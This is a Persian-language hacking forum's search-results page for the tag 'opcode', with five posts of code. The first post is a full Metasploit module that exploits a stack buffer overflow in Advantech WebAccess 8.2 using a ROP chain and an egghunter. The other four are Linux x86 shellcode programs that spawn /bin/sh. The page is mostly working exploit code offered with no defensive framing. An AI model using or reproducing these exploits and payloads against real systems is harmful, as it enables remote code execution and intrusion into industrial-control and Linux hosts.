امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'opcode'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

5 نتیجه پیدا شد

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  2. Hacking

    /* lnx_binsh2.c - v1 - 45 Byte /bin/sh sysenter Opcode Array Payload Copyright(c) 2005 c0ntex <c0ntex@open-security.org> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Tested: fedora core 3 execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80 (gdb) disas __kernel_vsyscall Dump of assembler code for function __kernel_vsyscall: 0xffffe400 <__kernel_vsyscall+0>: push %ecx 0xffffe401 <__kernel_vsyscall+1>: push %edx 0xffffe402 <__kernel_vsyscall+2>: push %ebp 0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp 0xffffe405 <__kernel_vsyscall+5>: sysenter 0xffffe407 <__kernel_vsyscall+7>: nop 0xffffe408 <__kernel_vsyscall+8>: nop 0xffffe409 <__kernel_vsyscall+9>: nop 0xffffe40a <__kernel_vsyscall+10>: nop 0xffffe40b <__kernel_vsyscall+11>: nop 0xffffe40c <__kernel_vsyscall+12>: nop 0xffffe40d <__kernel_vsyscall+13>: nop 0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3> 0xffffe410 <__kernel_vsyscall+16>: pop %ebp 0xffffe411 <__kernel_vsyscall+17>: pop %edx 0xffffe412 <__kernel_vsyscall+18>: pop %ecx 0xffffe413 <__kernel_vsyscall+19>: ret 0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax) 0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax) 0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax) 0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax) 0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax) 0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax) End of assembler dump. (gdb) q so we replace int $0x80 instruction with push %ecx push %edx push %ebp mov %esp,%ebp sysenter which does make the shellcode slightly larger :/ 804807a: 51 push %ecx 804807b: 52 push %edx 804807c: 55 push %ebp 804807d: 89 e5 mov %esp,%ebp 804807f: 0f 34 sysenter */ /* Calling: execve(/bin/sh), exit(0) */ #include <stdio.h> typedef char wikkid; wikkid oPc0d3z[] = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" "\x0b\x51\x52\x55\x89\xe5\x0f\x34" "\x31\xc0\x31\xdb\xfe\xc0\x51\x52" "\x55\x89\xe5\x0f\x34"; unsigned long grab_esp() { __asm__("movl %esp,%eax"); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+45); pointer(); } _exit(0); }
  3. Hacking

    /* lnx_binsh3.c - v1 - 27 Byte /bin/sh sysenter Opcode Array Payload Copyright(c) 2005 c0ntex <c0ntex@open-security.org> Copyright(c) 2005 amnesia <amnesia@anomalistic.org> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Tested: fedora core 3 - c0ntex debian SID - amnesia execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80 (gdb) disas __kernel_vsyscall Dump of assembler code for function __kernel_vsyscall: 0xffffe400 <__kernel_vsyscall+0>: push %ecx 0xffffe401 <__kernel_vsyscall+1>: push %edx 0xffffe402 <__kernel_vsyscall+2>: push %ebp 0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp 0xffffe405 <__kernel_vsyscall+5>: sysenter 0xffffe407 <__kernel_vsyscall+7>: nop 0xffffe408 <__kernel_vsyscall+8>: nop 0xffffe409 <__kernel_vsyscall+9>: nop 0xffffe40a <__kernel_vsyscall+10>: nop 0xffffe40b <__kernel_vsyscall+11>: nop 0xffffe40c <__kernel_vsyscall+12>: nop 0xffffe40d <__kernel_vsyscall+13>: nop 0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3> 0xffffe410 <__kernel_vsyscall+16>: pop %ebp 0xffffe411 <__kernel_vsyscall+17>: pop %edx 0xffffe412 <__kernel_vsyscall+18>: pop %ecx 0xffffe413 <__kernel_vsyscall+19>: ret 0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax) 0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax) 0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax) 0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax) 0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax) 0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax) End of assembler dump. (gdb) q so we replace int $0x80 instruction with push %ecx push %edx push %ebp mov %esp,%ebp sysenter which does make the shellcode slightly larger :/ 804807a: 51 push %ecx 804807b: 52 push %edx 804807c: 55 push %ebp 804807d: 89 e5 mov %esp,%ebp 804807f: 0f 34 sysenter $ ./lnx_binsh3 [-] Stack Pointer found -> [0xbffff648] [-] Size of payload egg -> [27] [-] Payload Begin -> [0x804968c] [-] Payload End -> [0x80496b9] sh-2.05b$ */ /* Calling: execve(/bin/sh), exit(0) */ #include <stdio.h> typedef char wikkid; /* reduced shellcode size from 45 to 27 - amnesia */ wikkid oPc0d3z[] = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" "\x0b\x0f\x34"; unsigned long grab_esp() { __asm__("movl %esp,%eax"); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+27); pointer(); } _exit(0); }
  4. Hacking

    /* lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload Copyright(c) 2005 c0ntex <c0ntex@open-security.org> Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Tested: fedora core 3 - c0ntex fedora core 4 - BaCkSpAcE debian SID - amnesia execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80 (gdb) disas __kernel_vsyscall Dump of assembler code for function __kernel_vsyscall: 0xffffe400 <__kernel_vsyscall+0>: push %ecx 0xffffe401 <__kernel_vsyscall+1>: push %edx 0xffffe402 <__kernel_vsyscall+2>: push %ebp 0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp 0xffffe405 <__kernel_vsyscall+5>: sysenter 0xffffe407 <__kernel_vsyscall+7>: nop 0xffffe408 <__kernel_vsyscall+8>: nop 0xffffe409 <__kernel_vsyscall+9>: nop 0xffffe40a <__kernel_vsyscall+10>: nop 0xffffe40b <__kernel_vsyscall+11>: nop 0xffffe40c <__kernel_vsyscall+12>: nop 0xffffe40d <__kernel_vsyscall+13>: nop 0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3> 0xffffe410 <__kernel_vsyscall+16>: pop %ebp 0xffffe411 <__kernel_vsyscall+17>: pop %edx 0xffffe412 <__kernel_vsyscall+18>: pop %ecx 0xffffe413 <__kernel_vsyscall+19>: ret 0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax) 0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax) 0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax) 0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax) 0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax) 0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax) End of assembler dump. (gdb) q so we replace int $0x80 instruction with push %ecx push %edx push %ebp mov %esp,%ebp sysenter which does make the shellcode slightly larger :/ 804807a: 51 push %ecx 804807b: 52 push %edx 804807c: 55 push %ebp 804807d: 89 e5 mov %esp,%ebp 804807f: 0f 34 sysenter $ ./lnx_binsh4 [-] Stack Pointer found -> [0xbfe0f0d8] [-] Size of payload egg -> [23] [-] Payload Begin -> [0x80496c0] [-] Payload End -> [0x80496d7] sh-3.00b$ */ /* Calling: execve(/bin/sh), exit(0) */ #include <stdio.h> typedef char wikkid; /* reduced shellcode size from 45 to 23 - BaCkSpAcE */ wikkid oPc0d3z[] = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x54" "\x5b\x52\x53\x54\x59\x0f\x34"; unsigned long grab_esp() { __asm__("movl %esp,%eax"); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+23); pointer(); } _exit(0); }
  5. Hacking

    /* lnx_binsh4.c - v1 - 21 Byte /bin/sh Opcode Array Payload Copyright(c) 2004 c0ntex <c0ntex@open-security.org> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Calling: execve(/bin/sh) */ #include <stdio.h> typedef char wikkid; wikkid oPc0d3z[] = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" unsigned long grab_esp() { __asm__(" xorl %eax,%eax movl %eax,%ebx movl %esp,%eax "); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+21); pointer(); } _exit(0x01); }